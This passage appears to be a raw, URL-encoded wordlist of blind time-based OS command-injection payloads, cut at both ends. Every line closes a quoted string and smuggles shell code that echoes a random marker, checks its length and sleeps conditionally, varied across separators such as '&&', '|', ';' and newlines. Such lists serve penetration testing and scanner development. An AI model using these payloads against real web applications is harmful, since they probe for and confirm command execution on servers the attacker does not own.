206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%0A%20str%3D%24%28echo%20OECGFV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20BUMBBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%0A%20str%3D%24%28echo%20IWTYRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20XAUGRF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20JRAZZA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JWEAWE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%0A%20str%3D%24%28echo%20JLTOOU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20USUNJP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20NREISI%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XTMPBT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%0A%20str%3D%24%28echo%20OUJVKX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%2522%3B%20str%3D%24%28echo%20PRACFZ%29%3B%20str1%3D%24%7B%23str%